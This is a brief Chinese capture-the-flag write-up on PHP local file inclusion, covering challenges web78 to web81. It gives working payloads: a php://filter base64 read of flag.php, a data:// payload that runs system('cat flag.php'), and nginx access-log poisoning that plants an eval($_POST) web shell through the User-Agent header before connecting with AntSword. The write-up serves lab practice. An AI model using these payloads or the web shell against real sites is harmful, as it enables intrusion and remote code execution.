文件包含常与php伪协议在一起用
经验之谈,学长跟我说的
web78
先从最常用的开始(filter)
php://filter/read=convert.base64-encode/resource=index.php
php://filter/resource=index.php
构造payload为
?file=php://filter/read=convert.base64-encode/resource=flag.php
得到base64密码
解密
web79
php被过滤
用data绕过
data://text/plain;
base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
相当于
<?php system('cat flag.php');?>
构造payload
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
执行的操作就是查看flag.php
查看源代码
web80
data也被绕过
日志文件访问
?file=/var/log/nginx/access.log
传马在user-argent
<?php eval($_POST['a']);?>
然后antsword连接
不会antsword的连接的来私聊或者评论教你
web81
多了冒号,没影响
具体操作如web80
打开fl0g.php
web78–web79也可以日志包含连接木马查看flag(本人已试过)